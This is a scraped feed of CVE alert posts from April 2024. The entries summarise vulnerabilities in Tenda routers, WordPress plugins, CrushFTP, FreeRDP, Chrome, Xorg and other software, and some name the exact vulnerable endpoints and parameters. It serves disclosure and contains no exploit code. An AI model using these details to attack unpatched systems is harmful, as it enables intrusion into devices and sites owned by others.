🚨 CVE-2024-4123A vulnerability, which was classified as critical, has been found in Tenda W15E 15.11.0.14. Affected by this issue is the function formSetPortMapping of the file /goform/SetPortMapping. The manipulation of the argument portMappingServer/portMappingProtocol/portMappingWan/porMappingtInternal/portMappingExternal leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-261866 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 19:37:26 |
🚨 CVE-2024-20359A vulnerability in a legacy capability that allowed for the preloading of VPN clients and plug-ins and that has been available in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerability. This vulnerability is due to improper validation of a file when it is read from system flash memory. An attacker could exploit this vulnerability by copying a crafted file to the disk0: file system of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device after the next reload of the device, which could alter system behavior. Because the injected code could persist across device reboots, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.🎖@cveNotify |
|
| 2024-04-24 19:37:25 |
🚨 CVE-2023-38817An issue in Inspect Element Ltd Echo.ac v.5.2.1.0 allows a local attacker to gain privileges via a crafted command to the echo_driver.sys component. NOTE: the vendor's position is that the reported ability for user-mode applications to execute code as NT AUTHORITY\SYSTEM was "deactivated by Microsoft itself."🎖@cveNotify |
|
| 2024-04-24 19:37:24 |
🚨 CVE-2023-26756The login page of Revive Adserver v5.4.1 is vulnerable to brute force attacks.🎖@cveNotify |
|
| 2024-04-24 18:37:26 |
🚨 CVE-2024-4121A vulnerability classified as critical has been found in Tenda W15E 15.11.0.14. Affected is the function formQOSRuleDel. The manipulation of the argument qosIndex leads to stack-based buffer overflow. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-261864. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 18:37:25 |
🚨 CVE-2024-0151Insufficient argument checking in Secure state Entry functions in software using Cortex-M Security Extensions (CMSE), that has been compiled using toolchains that implement 'Arm v8-M Security Extensions Requirements on Development Tools' prior to version 1.4, allows an attacker to pass values to Secure state that are out of range for types smaller than 32-bits. Out of range values might lead to incorrect operations in secure state due.🎖@cveNotify |
|
| 2024-04-24 18:37:24 |
🚨 CVE-2023-5393Server receiving a malformed message that causes a disconnect to a hostname may causing a stack overflow resulting in possible remote code execution. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-24 15:37:49 |
🚨 CVE-2024-4113A vulnerability classified as critical was found in Tenda TX9 22.03.02.10. This vulnerability affects the function sub_42D4DC of the file /goform/SetSysTimeCfg. The manipulation of the argument time leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261856. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 15:37:48 |
🚨 CVE-2024-4112A vulnerability classified as critical has been found in Tenda TX9 22.03.02.10. This affects the function sub_42CB94 of the file /goform/SetVirtualServerCfg. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261855. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 15:37:44 |
🚨 CVE-2024-32958Cross-Site Request Forgery (CSRF) vulnerability in Giorgos Sarigiannidis Slash Admin allows Cross-Site Scripting (XSS).This issue affects Slash Admin: from n/a through 3.8.1.🎖@cveNotify |
|
| 2024-04-24 15:37:43 |
🚨 CVE-2024-32947Cross-Site Request Forgery (CSRF) vulnerability in AlumniOnline Web Services LLC WP ADA Compliance Check Basic.This issue affects WP ADA Compliance Check Basic: from n/a through 3.1.3.🎖@cveNotify |
|
| 2024-04-24 15:37:42 |
🚨 CVE-2024-32806Cross-Site Request Forgery (CSRF) vulnerability in CoSchedule Headline Analyzer.This issue affects Headline Analyzer: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-04-24 15:37:41 |
🚨 CVE-2024-32795Cross-Site Request Forgery (CSRF) vulnerability in Revmakx WPCal.Io – Easy Meeting Scheduler.This issue affects WPCal.Io – Easy Meeting Scheduler: from n/a through 0.9.5.8.🎖@cveNotify |
|
| 2024-04-24 15:37:37 |
🚨 CVE-2024-32794Cross-Site Request Forgery (CSRF) vulnerability in Paid Memberships Pro.This issue affects Paid Memberships Pro: from n/a through 2.12.10.🎖@cveNotify |
|
| 2024-04-24 15:37:36 |
🚨 CVE-2024-32793Cross-Site Request Forgery (CSRF) vulnerability in Paid Memberships Pro.This issue affects Paid Memberships Pro: from n/a through 2.12.10.🎖@cveNotify |
|
| 2024-04-24 15:37:35 |
🚨 CVE-2024-32728Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Paid Member Subscriptions.This issue affects Paid Member Subscriptions: from n/a through 2.11.0.🎖@cveNotify |
|
| 2024-04-24 15:37:34 |
🚨 CVE-2024-32699Cross-Site Request Forgery (CSRF) vulnerability in YITH YITH WooCommerce Compare.This issue affects YITH WooCommerce Compare: from n/a through 2.37.0.🎖@cveNotify |
|
| 2024-04-24 15:37:30 |
🚨 CVE-2023-25785Missing Authorization vulnerability in Shoaib Saleem WP Post Rating allows Functionality Misuse.This issue affects WP Post Rating: from n/a through 2.5.🎖@cveNotify |
|
| 2024-04-24 15:37:29 |
🚨 CVE-2023-23989Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metagauss RegistrationMagic.This issue affects RegistrationMagic: from n/a through 5.1.9.2.🎖@cveNotify |
|
| 2024-04-24 15:37:28 |
🚨 CVE-2024-27937GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can obtain the email address of all GLPI users. This issue has been patched in version 10.0.13.🎖@cveNotify |
|
| 2024-04-24 15:37:27 |
🚨 CVE-2024-27930GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can access sensitive fields data from items on which he has read access. This issue has been patched in version 10.0.13.🎖@cveNotify |
|
| 2024-04-24 15:37:26 |
🚨 CVE-2023-28896Access to critical Unified Diagnostics Services (UDS) of the Modular Infotainment Platform 3 (MIB3) infotainment is transmitted via Controller Area Network (CAN) bus in a form that can be easily decoded by attackers with physical access to the vehicle.Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.🎖@cveNotify |
|
| 2024-04-24 14:37:24 |
🚨 CVE-2024-4111A vulnerability was found in Tenda TX9 22.03.02.10. It has been rated as critical. Affected by this issue is the function sub_42BD7C of the file /goform/SetLEDCfg. The manipulation of the argument time leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-261854 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-24 14:07:44 |
🚨 CVE-2024-21979An out of bounds write vulnerability in the AMD Radeon™ user mode driver for DirectX® 11 could allow an attacker with access to a malformed shader to potentially achieve arbitrary code execution.🎖@cveNotify |
|
| 2024-04-24 14:07:43 |
🚨 CVE-2024-32258The network server of fceux 2.7.0 has a path traversal vulnerability, allowing attackers to overwrite any files on the server without authentication by fake ROM.🎖@cveNotify |
|
| 2024-04-24 14:07:42 |
🚨 CVE-2024-33217Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the page parameter in ip/goform/addressNat.🎖@cveNotify |
|
| 2024-04-24 14:07:38 |
🚨 CVE-2024-33214Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the entrys parameter in ip/goform/RouteStatic.🎖@cveNotify |
|
| 2024-04-24 14:07:37 |
🚨 CVE-2024-33212Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the funcpara1 parameter in ip/goform/setcfm.🎖@cveNotify |
|
| 2024-04-24 14:07:36 |
🚨 CVE-2024-33211Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the PPPOEPassword parameter in ip/goform/QuickIndex.🎖@cveNotify |
|
| 2024-04-24 14:07:33 |
🚨 CVE-2024-32679Missing Authorization vulnerability in Shared Files PRO Shared Files.This issue affects Shared Files: from n/a through 1.7.16.🎖@cveNotify |
|
| 2024-04-24 14:07:32 |
🚨 CVE-2024-28130An incorrect type conversion vulnerability exists in the DVPSSoftcopyVOI_PList::createFromImage functionality of OFFIS DCMTK 3.6.8. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-24 14:07:31 |
🚨 CVE-2024-28627An issue in Flipsnack v.18/03/2024 allows a local attacker to obtain sensitive information via the reader.gz.js file.🎖@cveNotify |
|
| 2024-04-24 14:07:27 |
🚨 CVE-2024-3911An unauthenticated remote attacker can deceive users into performing unintended actions due to improper restriction of rendered UI layers or frames.🎖@cveNotify |
|
| 2024-04-24 14:07:26 |
🚨 CVE-2024-26922In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: validate the parameters of bo mapping operations more clearlyVerify the parameters ofamdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place.🎖@cveNotify |
|
| 2024-04-24 14:07:25 |
🚨 CVE-2023-47731IBM QRadar Suite Software 1.10.12.0 through 1.10.19.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 272203.🎖@cveNotify |
|
| 2024-04-24 11:37:37 |
🚨 CVE-2024-32954Unrestricted Upload of File with Dangerous Type vulnerability in Tribulant Newsletters.This issue affects Newsletters: from n/a through 4.9.5.🎖@cveNotify |
|
| 2024-04-24 11:37:36 |
🚨 CVE-2024-32823Authorization Bypass Through User-Controlled Key vulnerability in FeedbackWP Rate my Post – WP Rating System.This issue affects Rate my Post – WP Rating System: from n/a through 3.4.4.🎖@cveNotify |
|
| 2024-04-24 11:37:32 |
🚨 CVE-2024-32789Cross-Site Request Forgery (CSRF) vulnerability in Seers allows Cross-Site Scripting (XSS).This issue affects Seers: from n/a through 8.1.0.🎖@cveNotify |
|
| 2024-04-24 11:37:31 |
🚨 CVE-2024-32772Authorization Bypass Through User-Controlled Key vulnerability in Metagauss ProfileGrid.This issue affects ProfileGrid : from n/a through 5.7.9.🎖@cveNotify |
|
| 2024-04-24 11:37:30 |
🚨 CVE-2024-32711Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in myCred allows Stored XSS.This issue affects myCred: from n/a through 2.6.3.🎖@cveNotify |
|
| 2024-04-24 11:37:26 |
🚨 CVE-2024-32702Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Repute info systems ARForms allows Reflected XSS.This issue affects ARForms: from n/a through 6.4.🎖@cveNotify |
|
| 2024-04-24 11:37:25 |
🚨 CVE-2023-23976Incorrect Default Permissions vulnerability in Metagauss RegistrationMagic allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects RegistrationMagic: from n/a through 5.1.9.2.🎖@cveNotify |
|
| 2024-04-24 11:37:24 |
🚨 CVE-2022-45852Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in FormAssembly / Drew Buschhorn WP-FormAssembly allows Path Traversal.This issue affects WP-FormAssembly: from n/a through 2.0.5.🎖@cveNotify |
|
| 2024-04-24 09:37:33 |
🚨 CVE-2024-32956Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rometheme RomethemeKit For Elementor allows Stored XSS.This issue affects RomethemeKit For Elementor: from n/a through 1.4.1.🎖@cveNotify |
|
| 2024-04-24 09:37:32 |
🚨 CVE-2024-32952Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BloomPixel Max Addons Pro for Bricks allows Reflected XSS.This issue affects Max Addons Pro for Bricks: from n/a through 1.6.1.🎖@cveNotify |
|
| 2024-04-24 09:37:31 |
🚨 CVE-2024-32950Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DeBAAT WP Media Category Management allows Reflected XSS.This issue affects WP Media Category Management: from n/a through 2.2.🎖@cveNotify |
|
| 2024-04-24 09:37:30 |
🚨 CVE-2024-32834Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebToffee WooCommerce Shipping Label allows Stored XSS.This issue affects WooCommerce Shipping Label: from n/a through 2.3.8.🎖@cveNotify |
|
| 2024-04-24 09:37:26 |
🚨 CVE-2024-32815Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeroen Peters All-in-one Like Widget allows Stored XSS.This issue affects All-in-one Like Widget: from n/a through 2.2.7.🎖@cveNotify |
|
| 2024-04-24 09:37:25 |
🚨 CVE-2024-32791Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leap13 Premium Addons for Elementor allows Stored XSS.This issue affects Premium Addons for Elementor: from n/a through 4.10.25.🎖@cveNotify |
|
| 2024-04-24 09:37:24 |
🚨 CVE-2024-32706Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Repute info systems ARForms.This issue affects ARForms: from n/a through 6.4.🎖@cveNotify |
|
| 2024-04-24 08:37:42 |
🚨 CVE-2024-32835Deserialization of Untrusted Data vulnerability in WebToffee Import Export WordPress Users.This issue affects Import Export WordPress Users: from n/a through 2.5.3.🎖@cveNotify |
|
| 2024-04-24 08:37:41 |
🚨 CVE-2024-32816Exposure of Sensitive Information to an Unauthorized Actor vulnerability in PickPlugins Post Grid.This issue affects Post Grid: from n/a through 2.2.78.🎖@cveNotify |
|
| 2024-04-24 08:37:40 |
🚨 CVE-2024-32812Server-Side Request Forgery (SSRF) vulnerability in Podlove Podlove Podcast Publisher.This issue affects Podlove Podcast Publisher: from n/a through 4.0.11.🎖@cveNotify |
|
| 2024-04-24 08:37:36 |
🚨 CVE-2024-32796Insertion of Sensitive Information into Log File vulnerability in Very Good Plugins WP Fusion Lite.This issue affects WP Fusion Lite: from n/a through 3.42.10.🎖@cveNotify |
|
| 2024-04-24 08:37:35 |
🚨 CVE-2024-32782Exposure of Sensitive Information to an Unauthorized Actor vulnerability in HasThemes HT Mega.This issue affects HT Mega: from n/a through 2.4.7.🎖@cveNotify |
|
| 2024-04-24 08:37:34 |
🚨 CVE-2024-32781Exposure of Sensitive Information to an Unauthorized Actor vulnerability in ThemeHigh Email Customizer for WooCommerce.This issue affects Email Customizer for WooCommerce: from n/a through 2.6.0.🎖@cveNotify |
|
| 2024-04-24 08:37:31 |
🚨 CVE-2024-32775Server-Side Request Forgery (SSRF) vulnerability in Pavex Embed Google Photos album.This issue affects Embed Google Photos album: from n/a through 2.1.9.🎖@cveNotify |
|
| 2024-04-24 08:37:30 |
🚨 CVE-2024-32718Server-Side Request Forgery (SSRF) vulnerability in Webangon The Pack Elementor.This issue affects The Pack Elementor addons: from n/a through 2.0.8.2.🎖@cveNotify |
|
| 2024-04-24 08:37:29 |
🚨 CVE-2024-32716Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StreamWeasels StreamWeasels Twitch Integration.This issue affects StreamWeasels Twitch Integration: from n/a through 1.7.8.🎖@cveNotify |
|
| 2024-04-24 08:37:26 |
🚨 CVE-2024-32709Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Plechev Andrey WP-Recall.This issue affects WP-Recall: from n/a through 16.26.5.🎖@cveNotify |
|
| 2024-04-24 08:37:25 |
🚨 CVE-2024-28976Dell Repository Manager, versions prior to 3.4.5, contains a Path Traversal vulnerability in API module. A local attacker with low privileges could potentially exploit this vulnerability to gain unauthorized write access to the files stored on the server filesystem with the privileges of the running web application.🎖@cveNotify |
|
| 2024-04-24 08:37:24 |
🚨 CVE-2024-28963Telemetry Dashboard v1.0.0.7 for Dell ThinOS 2402 contains a sensitive information disclosure vulnerability. An unauthenticated user with local access to the device could exploit this vulnerability to read sensitive proxy settings information.🎖@cveNotify |
|
| 2024-04-24 07:37:26 |
🚨 CVE-2024-32951Missing Authorization vulnerability in BloomPixel Max Addons Pro for Bricks.This issue affects Max Addons Pro for Bricks: from n/a through 1.6.1.🎖@cveNotify |
|
| 2024-04-24 07:37:25 |
🚨 CVE-2024-32948Missing Authorization vulnerability in Repute Infosystems ARMember.This issue affects ARMember: from n/a through 4.0.28.🎖@cveNotify |
|
| 2024-04-24 07:37:24 |
🚨 CVE-2024-32819Server-Side Request Forgery (SSRF) vulnerability in Culqi.This issue affects Culqi: from n/a through 3.0.14.🎖@cveNotify |
|
| 2024-04-24 06:37:25 |
🚨 CVE-2024-32051Insertion of sensitive information into log file issue exists in RoamWiFi R10 prior to 4.8.45. If this vulnerability is exploited, a network-adjacent unauthenticated attacker with access to the device may obtain sensitive information.🎖@cveNotify |
|
| 2024-04-24 06:37:24 |
🚨 CVE-2024-31406Active debug code vulnerability exists in RoamWiFi R10 prior to 4.8.45. If this vulnerability is exploited, a network-adjacent unauthenticated attacker with access to the device may perform unauthorized operations.🎖@cveNotify |
|
| 2024-04-24 05:37:30 |
🚨 CVE-2024-2972The Floating Chat Widget: Contact Chat Icons, WhatsApp, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button WordPress plugin before 3.1.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-24 05:37:26 |
🚨 CVE-2024-2402The Better Comments WordPress plugin before 1.5.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-24 05:37:25 |
🚨 CVE-2024-1743The WooCommerce Customers Manager WordPress plugin before 29.8 does not sanitise and escape various parameters before outputting them back in pages and attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-04-24 05:37:24 |
🚨 CVE-2023-7253The Import WP WordPress plugin before 2.13.1 does not prevent users with the administrator role from pinging conducting SSRF attacks, which may be a problem in multisite configurations.🎖@cveNotify |
|
| 2024-04-24 04:37:24 |
🚨 CVE-2024-28613SQL Injection vulnerability in PHP Task Management System v.1.0 allows a remote attacker to escalate privileges and obtain sensitive information via the task_id parameter of the task-details.php, and edit-task.php component.🎖@cveNotify |
|
| 2024-04-24 03:37:24 |
🚨 CVE-2024-31032An issue in Huashi Private Cloud CDN Live Streaming Acceleration Server hgateway-sixport v.1.1.2 allows a remote attacker to execute arbitrary code via the manager/ipping.php component.🎖@cveNotify |
|
| 2024-04-24 02:37:29 |
🚨 CVE-2024-31083A use-after-free vulnerability was found in the ProcRenderAddGlyphs() function of Xorg servers. This issue occurs when AllocateGlyph() is called to store new glyphs sent by the client to the X server, potentially resulting in multiple entries pointing to the same non-refcounted glyphs. Consequently, ProcRenderAddGlyphs() may free a glyph, leading to a use-after-free scenario when the same glyph pointer is subsequently accessed. This flaw allows an authenticated attacker to execute arbitrary code on the system by sending a specially crafted request.🎖@cveNotify |
|
| 2024-04-24 02:37:28 |
🚨 CVE-2024-31081A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIPassiveGrabDevice() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.🎖@cveNotify |
|
| 2024-04-24 02:37:27 |
🚨 CVE-2024-28456Cross Site Scripting vulnerability in Campcodes Online Marriage Registration System v.1.0 allows a remote attacker to execute arbitrary code via the text fields in the marriage registration request form.🎖@cveNotify |
|
| 2024-04-24 02:37:26 |
🚨 CVE-2024-28323The bwdates-report-result.php file in Phpgurukul User Registration & Login and User Management System 3.1 contains a potential security vulnerability related to user input validation. The script retrieves user-provided date inputs without proper validation, making it susceptible to SQL injection attacks.🎖@cveNotify |
|
| 2024-04-24 01:37:25 |
🚨 CVE-2024-4093A vulnerability, which was classified as critical, was found in SourceCodester Simple Subscription Website 1.0. Affected is an unknown function of the file view_application.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-261822 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-24 01:07:24 |
🚨 CVE-2022-38028Windows Print Spooler Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-04-23 23:37:26 |
🚨 CVE-2024-4074A vulnerability was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file prodInfo.php. The manipulation of the argument prodId leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261800.🎖@cveNotify |
|
| 2024-04-23 23:37:25 |
🚨 CVE-2024-4040A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.🎖@cveNotify |
|
| 2024-04-23 21:37:30 |
🚨 CVE-2024-4066A vulnerability classified as critical has been found in Tenda AC8 16.03.34.09. Affected is the function fromAdvSetMacMtuWan of the file /goform/AdvSetMacMtuWan. The manipulation of the argument wanMTU/wanSpeed/cloneType/mac/serviceName/serverName leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261792. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-23 21:37:26 |
🚨 CVE-2024-32869Hono is a Web application framework that provides support for any JavaScript runtime. Prior to version 4.2.7, when using serveStatic with deno, it is possible to traverse the directory where `main.ts` is located. This can result in retrieval of unexpected files. Version 4.2.7 contains a patch for the issue.🎖@cveNotify |
|
| 2024-04-23 21:37:25 |
🚨 CVE-2024-32662FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients prior to version 3.5.1 are vulnerable to out-of-bounds read. This occurs when `WCHAR` string is read with twice the size it has and converted to `UTF-8`, `base64` decoded. The string is only used to compare against the redirection server certificate. Version 3.5.1 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-23 21:37:24 |
🚨 CVE-2024-2919The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the CountUp Widget in all versions up to, and including, 3.2.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-23 20:37:31 |
🚨 CVE-2024-4065A vulnerability was found in Tenda AC8 16.03.34.09. It has been rated as critical. This issue affects the function formSetRebootTimer of the file /goform/SetRebootTimer. The manipulation of the argument rebootTime leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261791. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-23 20:37:30 |
🚨 CVE-2024-4064A vulnerability was found in Tenda AC8 16.03.34.09. It has been declared as critical. This vulnerability affects the function R7WebsSecurityHandler of the file /goform/execCommand. The manipulation of the argument password leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-261790 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-23 20:37:27 |
🚨 CVE-2024-32661FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients prior to version 3.5.1 are vulnerable to a possible `NULL` access and crash. Version 3.5.1 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-23 20:37:26 |
🚨 CVE-2024-32660FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.5.1, a malicious server can crash the FreeRDP client by sending invalid huge allocation size. Version 3.5.1 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-23 20:37:25 |
🚨 CVE-2024-22638liveSite v2019.1 was discovered to contain a remote code execution (RCE) vulenrabiity via the component /livesite/edit_designer_region.php or /livesite/add_email_campaign.php.🎖@cveNotify |
|
| 2024-04-23 20:37:24 |
🚨 CVE-2022-30007GXCMS V1.5 has a file upload vulnerability in the background. The vulnerability is the template management page. You can edit any template content and then rename to PHP suffix file, after calling PHP file can control the server.🎖@cveNotify |
|
| 2024-04-23 20:07:31 |
🚨 CVE-2024-26592In the Linux kernel, the following vulnerability has been resolved:ksmbd: fix UAF issue in ksmbd_tcp_new_connection()The race is between the handling of a new TCP connection andits disconnection. It leads to UAF on `struct tcp_transport` inksmbd_tcp_new_connection() function.🎖@cveNotify |
|
| 2024-04-23 20:07:30 |
🚨 CVE-2024-24558TanStack Query supplies asynchronous state management, server-state utilities and data fetching for the web. The `@tanstack/react-query-next-experimental` NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this, an attacker would need to either inject malicious input or arrange to have malicious input be returned from an endpoint. To fix this issue, please update to version 5.18.0 or later.🎖@cveNotify |
|
| 2024-04-23 20:07:26 |
🚨 CVE-2007-0172Multiple PHP remote file inclusion vulnerabilities in AllMyGuests 0.3.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the AMG_serverpath parameter to (1) comments.php and (2) signin.php; and possibly via a URL in unspecified parameters to (3) include/submit.inc.php, (4) admin/index.php, (5) include/cm_submit.inc.php, and (6) index.php.🎖@cveNotify |
|
| 2024-04-23 20:07:25 |
🚨 CVE-2006-4993Multiple PHP remote file inclusion vulnerabilities in AllMyGuests 0.4.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _AMGconfig[cfg_serverpath] parameter in (1) modules/AllMyGuests/signin.php (aka the Nuke module) and (2) AllMyGuests/signin.php (aka the standalone).🎖@cveNotify |
|
| 2024-04-23 20:07:24 |
🚨 CVE-2004-0285PHP remote file inclusion vulnerabilities in include/footer.inc.php in (1) AllMyVisitors, (2) AllMyLinks, and (3) AllMyGuests allow remote attackers to execute arbitrary PHP code via a URL in the _AMVconfig[cfg_serverpath] parameter.🎖@cveNotify |
|
| 2024-04-23 19:37:25 |
🚨 CVE-2024-4062A vulnerability was found in Hualai Xiaofang iSC5 3.2.2_112 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to improper certificate validation. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of this vulnerability is VDB-261788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-23 19:07:24 |
🚨 CVE-2021-38201net/sunrpc/xdr.c in the Linux kernel before 5.13.4 allows remote attackers to cause a denial of service (xdr_set_page_base slab-out-of-bounds access) by performing many NFS 4.2 READ_PLUS operations.🎖@cveNotify |
|
| 2024-04-23 18:37:43 |
🚨 CVE-2024-32482The Tillitis TKey signer device application is an ed25519 signing tool. A vulnerability has been found that makes it possible to disclose portions of the TKey’s data in RAM over the USB interface. To exploit the vulnerability an attacker needs to use a custom client application and to touch the TKey. No secret is disclosed. All client applications integrating tkey-device-signer should upgrade to version 1.0.0 to receive a fix. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-23 18:37:42 |
🚨 CVE-2024-31208Synapse is an open-source Matrix homeserver. A remote Matrix user with malicious intent, sharing a room with Synapse instances before 1.105.1, can dispatch specially crafted events to exploit a weakness in the V2 state resolution algorithm. This can induce high CPU consumption and accumulate excessive data in the database of such instances, resulting in a denial of service. Servers in private federations, or those that do not federate, are not affected. Server administrators should upgrade to 1.105.1 or later. Some workarounds are available. One can ban the malicious users or ACL block servers from the rooms and/or leave the room and purge the room using the admin API.🎖@cveNotify |
|
| 2024-04-23 18:37:38 |
🚨 CVE-2024-3847Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-04-23 18:37:37 |
🚨 CVE-2024-3845Inappropriate implementation in Networks in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass mixed content policy via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-04-23 18:37:36 |
🚨 CVE-2024-3844Inappropriate implementation in Extensions in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-04-23 18:37:33 |
🚨 CVE-2024-3843Insufficient data validation in Downloads in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-23 18:37:32 |
🚨 CVE-2024-3841Insufficient data validation in Browser Switcher in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to inject scripts or HTML into a privileged page via a malicious file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-23 18:37:31 |
🚨 CVE-2024-3839Out of bounds read in Fonts in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-23 18:37:30 |
